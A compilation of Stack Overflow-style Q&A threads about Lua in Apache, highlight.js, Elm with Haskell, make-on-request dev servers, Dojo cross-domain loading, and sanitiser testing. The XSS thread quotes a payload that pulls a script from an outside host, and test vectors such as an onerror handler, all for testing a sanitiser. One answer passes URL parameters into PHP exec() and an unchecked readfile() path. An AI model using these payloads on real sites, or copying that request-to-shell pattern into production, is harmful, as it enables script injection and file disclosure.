Lua embedded in HTML with Apache

Apache has mod_lua. Is there a way to have it process an HTML page with inline tags, similar to PHP?
If not, is there some other method? (I've seen mod_pLua, but it doesn't seem to have much work put into it.)

I haven't actually tried it, but Haserl may be what you need.
It was reported to be working on the lua-users mailing list.
Haserl is a small cgi wrapper that allows "PHP" style cgi programming, but uses a UNIX bash-like shell or Lua as the programming language. It is very small, so it can be used in embedded environments, or where something like PHP is too big.
P.S.
I haven't worked with it, so I'm not exactly sure how well it works.
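For a sense of the style, a minimal Haserl page might look like this (an untested sketch; it assumes Haserl was built with Lua support, and the --shell=lua flag and <% %> delimiters are taken from its documentation):
#!/usr/bin/haserl --shell=lua
<html>
  <body>
    <%
      -- plain Lua between the delimiters; io.write() goes to the page
      io.write("Hello from Lua, it is " .. os.date())
    %>
  </body>
</html>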

For PHP-style Lua programming, you could definitely use mod_pLua.
Contrary to what your initial statement says, it has had a lot of work put into it; just look at the list of extra features it supports.
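For illustration, a page under mod_pLua looks roughly like this (a sketch based on mod_pLua's own examples, using its PHP-style <?lua ... ?> delimiters and echo() helper; untested here):
<html>
  <body>
    <?lua
        -- mod_pLua parses the page and runs these blocks, PHP-style
        echo("Hello, the time is " .. os.date())
    ?>
  </body>
</html>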
Whether or not mod_lua will support this kind of programming in the future...who knows :)

You need to update your config. In your Apache config, add the following lines:
AddHandler lua-script .lua
AddHandler lua-script .htm .html
That should set the handler for html files to mod_lua (not tested as I don't use this mod).
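One caveat: mod_lua does not interpret inline tags the way PHP does; it executes the mapped file as a Lua script and calls its handle() function. So a file served this way needs to be a script along these lines (a minimal sketch following the pattern in the mod_lua documentation, untested for the same reason):
-- hello.lua (or an .html file mapped to lua-script as above)
function handle(r)
    r.content_type = "text/html"   -- set the response Content-Type
    r:puts("<html><body>Hello from mod_lua</body></html>")
    return apache2.OK              -- tell Apache the request was handled
end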

Related

VB.NET syntax highlight problems using highlight.js in blog

I use highlight.js for syntax highlighting in my blog and it works fine for C# and Java, but I have problems with highlighting VB.NET code. Most keywords and comments are not highlighted.
For example:
Public Enum EditorBrowsableState
Always ' Always displayed
Never ' Not displayed
Advanced ' Displayed in the "All" tab
End Enum
The result is unhighlighted (I use <pre><code class="vb"> as always; excuse me, I can't add a sample image right now).
How can I handle this?
I know the question is a bit old, and the author has apparently stopped using highlight.js on his blog, so I don't even know whether this was the cause, but here is what kept VB code from being highlighted in my case.
It's just because the CDN library I used didn't include VB to begin with.
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/8.5/highlight.min.js"></script>
It only covers Apache, Bash, zsh, CoffeeScript, C++, C, C#, CSS, Diff, HTTP, Ini, Java, JSP, JavaScript, JSON, Makefile, XML, Markdown, Nginx, Objective-C, Perl, PHP, Ruby, Python, Gemspec, and so on. If we need something else, we have to load the language module for it.
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/8.5/languages/vbnet.min.js"></script>

Using Elm for front end development + serving dynamic Elm pages through Haskell

I started with Elm yesterday and I really enjoy using it. Without any experience in front end development I could build a nice looking webpage in only 30 lines of code, which is amazing.
Now I really want to use it in a real life example: I want to build a small blog.
But I need a way to communicate with Elm. For example, I query my database and get a list of blog entries, [Blog], and now I need to pass them to Elm.
I am not sure how I would do it. I was looking through the popular Haskell frameworks like Yesod, Snap, and Happstack, and the first thing that I found was http://hackage.haskell.org/package/snap-elm-0.1.1.2/docs/Snap-Elm.html
But it seems to be intended for serving static Elm files, and I need to pass arguments to it.
Is there a framework you would recommend that already has Elm support for serving dynamic Elm pages?
And if not, how would you do it?
My idea was to use Elm as a skeleton, generate a normal HTML file with Yesod, Snap, or Happstack, and integrate that file into Elm. Would this be possible?
Something that would look like this
container 1000 1000 middle <| displayHtml "/pages/my_generated_html_page.html"
Edit:
My first hacky solution was this:
tPage = plainText "<script src=\"http://code.jquery.com/jquery-1.10.1.min.js\"></script>\n
<script>\n
$(function(){\n
$(\"#includedContent\").load(\"/home/maik/b.html\");\n
});\n
</script>\n
<div id=\"includedContent\"></div>\n"
Unfortunately I am not allowed to use script tags in elm.
I recommend studying elm-lang.org's source code. The majority of it is pure Elm but there are pages that are generated on the server side with Haskell.
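To make the usual pattern concrete: the server renders a page that embeds the compiled Elm program and hands it the initial data through a port. Elm's API has changed a lot between releases, so treat this as a rough sketch in the 0.16-era style, with the module name Blog and the entries port made up for the example:
-- Blog.elm
module Blog where

import Graphics.Element exposing (Element, show)

-- incoming port; its initial value is supplied by the embedding page
port entries : Signal (List String)

main : Signal Element
main = Signal.map show entries
And in the HTML that Yesod/Snap/Happstack generates:
<div id="blog"></div>
<script src="blog.js"></script>
<script>
  // the server templates the real blog entries into this literal
  Elm.embed(Elm.Blog, document.getElementById('blog'),
            { entries: ["first post", "second post"] });
</script>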

How can I have my web server automatically rebuild the files it serves?

I sometimes write client-side-only web applications, and I like a simple and fast development cycle. This leads me to project layouts which explicitly have no build step, so that I can just edit source files and then reload in the web browser. This is not always a healthy constraint to place on the design. I would therefore like the following functionality to use in my development environment:
Whenever the server receives a GET /foo/bar request and translates it to a file /whatever/foo/bar, it executes cd /whatever && make foo/bar before reading the file.
What is the simplest way to accomplish this?
The best form of solution would be an Apache configuration, preferably one entirely within .htaccess files; failing that, a lightweight web server which has such functionality already; or one which can be programmed to do so.
Since I have attracted quite a lot of “don't do that” responses, let me reassure you on a few points:
This is client-side-only development — the files being served are all that matters, and the build will likely be very lightweight (e.g. copying a group of files into a target directory layout, or packing some .js files into a single file). Furthermore, the files will typically be loaded once per edit-and-reload cycle — so interactive response time is not a priority.
Assume that the build system is fully aware of the relevant dependencies — if nothing has changed, no rebuilding will happen.
If it turns out to be impractically slow despite the above, I'll certainly abandon this idea and find other ways to improve my workflow — but I'd like to at least give it a try.
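Concretely, the behavior I'm after could be sketched as a tiny standalone dev server (a hypothetical Python 3 sketch, just to pin down the semantics; run it from the directory being served):
import subprocess
from http.server import HTTPServer, SimpleHTTPRequestHandler

class MakeHandler(SimpleHTTPRequestHandler):
    # serve files from the current directory, rebuilding each one first
    def do_GET(self):
        target = self.path.lstrip("/").split("?", 1)[0]
        if target:
            # equivalent to: cd <docroot> && make foo/bar
            subprocess.call(["make", target])
        super().do_GET()

HTTPServer(("127.0.0.1", 8000), MakeHandler).serve_forever()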
You could use http://aspen.io/.
Presuming the makefile does some magic, you could make a simplate that does:
import subprocess
RESULTFILE = "/whatever/foo/bar"
^L
# rebuild, then serve the freshly built file
subprocess.call(['make'], cwd='/whatever')
response.body = open(RESULTFILE).read()
^L
But if it's less magic, you could of course encode the build process into the simplate itself (using something like https://code.google.com/p/fabricate/) and get rid of the makefile entirely.
Since I'm a lazy sod, I'd suggest something like this:
Options +FollowSymlinks
RewriteEngine On
RewriteBase /
RewriteRule ^(.*)\/(.*)(/|)$ /make.php?base=$1&make=$2 [L,NC]
A regex pattern like that provides the two required parameters, which can then be passed to a shell script by PHP's exec() function (a make.php along those lines is sketched below).
You might need to add exclusions above the pattern, or inclusions to the pattern,
e.g. define the first back-reference by words; otherwise it would match other requests as well (which shouldn't be rewritten).
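Something like the following make.php could do the job (a hypothetical sketch; only exec() itself is prescribed above, and real code would need proper input validation):
<?php
// make.php -- glue between the RewriteRule and the shell script
$base = $_GET['base'];   // first back-reference from the RewriteRule
$make = $_GET['make'];   // second back-reference
// run the build, handing both values to the shell script as $1 and $2
exec('/var/www/build.sh ' . escapeshellarg($base) . ' ' . escapeshellarg($make));
// then serve the freshly built file
readfile("/var/www/$base/$make");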
The parameters can be accessed in the shell script like this:
#!/bin/bash
# $1 = base directory, $2 = make target (as passed by make.php)
cd "/var/www/$1" && make "$2"
This seems like a really bad idea. You will add a HUGE amount of latency to each request waiting for the "make" to finish. In a development environment that is okay, but in production you are going to kill performance.
That said, you could write a simple apache module that would handle this:
http://linuxdocs.org/HOWTOs/Apache-Overview-HOWTO-12.html
I would still recommend considering whether this is what you want to do. In development you know that changing a file means you need to remake; in production it is a performance killer.

How to locally test cross-domain builds?

Using the dojo toolkit, what is the proper way of locally testing code that will be executed as cross-domain, without making the actual build?
As it appears, there are three possible options (each, with their own drawbacks):
Using local (non xd) XMLHttpRequest dojo.require
This option does not really test the xd behavior, since it dojo.require[s] the js synchronously via XHR.
djConfig.debugAtAllCosts = true;
Although this option does load the required code asynchronously (via the 'script' tag), it also pulls the code in via XHR, parses the dojo.require[s] inside that, and pulls them in. This (using the loader_debug), again, is not what the loader_xd is doing. More info on this topic in a different question.
Creating a cross-domain build
This approach requires a build, which is not possible in the environment which I'm running the code in (We're using our own on-the-fly build process, which includes only the js that is necessary for a particular page. This process is not suitable for development).
Thus, my question: is there a way to use the loader_xd, which does not require an xd build (which adds the xd prefix / suffix to every file)?
The 2nd way (using the debugAtAllCosts) also makes me question the motivation for pre-parsing the dojo.require[s]. If the loader_xd will not (or rather can not) pre-parse, why is the method that was created for testing/debugging doing so?
peller has described the situation. If you wanted to just generate the .xd.js files for your modules, you could look at util/buildscripts/jslib/buildUtilXd.js and its buildUtilXd.xdgen() function.
It would take a bit of work to make your own script, but you could look at util/buildscripts/build.js for pointers.
I am hoping in the future for Dojo (maybe Dojo 2.x timeframe) we can switch to a loader that just uses script tags with a module format that has a function wrapper around the module, something that is coded by the developer. This would allow the same module format to work in the local and xd cases.
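To illustrate, that function-wrapped format would look roughly like this (an illustrative sketch of the idea, essentially what AMD later standardized, not the Dojo loader syntax of the time):
define(["dojo/dom"], function(dom){
  // the wrapper runs only after its dependencies have loaded, so the same
  // file works through a plain <script> tag both locally and cross-domain
  return {
    greet: function(){ dom.byId("out").innerHTML = "hello"; }
  };
});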
I don't think there's any way to do XD loading without building and deploying it. Your analysis of the various options seems about right.
debugAtAllCosts is there specifically to solve a debugging problem: until recently, most browsers could not do anything intelligent with code brought in through eval. Even today, Firefox will report exceptions in the console as appearing at the eval site (bootstrap.js), with a line number offset from the eval rather than from the actual eval buffer, and normally that eval buffer is anonymous. Firebug was the first debugger to jump through some hoops to enhance the debugging experience; it permitted special metadata that Dojo's loader injects between the XHR and the eval to determine a filepath to the source. WebKit/Safari have recently implemented this also. I believe debugAtAllCosts pre-dates the XD loader.

XSS Torture Test - does it exist?

I'm looking to write an HTML sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror:
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
I know there's a MIME Torture Test, which comprises several nested emails with attachments and is used to test MIME decoders (if they can decode it properly, they've been proven to work). I'm basically looking for an equivalent for XSS, i.e. a list of examples of dodgy HTML that I can throw at my sanitiser just to make sure it works OK.
If anyone also has any good resources on how to write the sanitiser (i.e. what common exploits people try to use, etc) they'd be gratefully received too.
Thanks in advance :-)
Edit: Sorry if this wasn't clear before, but I was after a set of torture tests so I can write unit tests for the sanitiser, not test it in the browser, etc. The source data in theory may have come from anywhere - not just a browser.
Take a look at the OWASP XSS Filter Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
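A cheat sheet like that translates naturally into table-driven unit tests. A Python sketch (sanitise() is a stand-in for whatever your sanitiser actually exposes, and the vectors are classics of the kind the cheat sheet catalogues):
import unittest

# a few classic vectors of the kind the cheat sheet catalogues
VECTORS = [
    '<script>alert(1)</script>',
    '<IMG SRC="javascript:alert(1)">',
    '<img src=x onerror=alert(1)>',
    '<iframe src="javascript:alert(1)"></iframe>',
]

def sanitise(html):
    raise NotImplementedError  # stand-in for the sanitiser under test

class TestSanitiser(unittest.TestCase):
    def test_vectors_are_neutralised(self):
        for vector in VECTORS:
            cleaned = sanitise(vector).lower()
            self.assertNotIn('<script', cleaned)
            self.assertNotIn('javascript:', cleaned)
            self.assertNotIn('onerror', cleaned)

if __name__ == '__main__':
    unittest.main()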
XSS Me is a great Firefox plugin you can run against your sanitizer.
Check out OWASP. They have good guidance on how XSS works, what to look for, and even the WebGoat project, where you can try your hand on a vulnerable site.
You might try Jesse Ruderman's jsfunfuzz (http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/), which throws random data at your JavaScript trying to break it. It seems the Firefox team has used it with great success.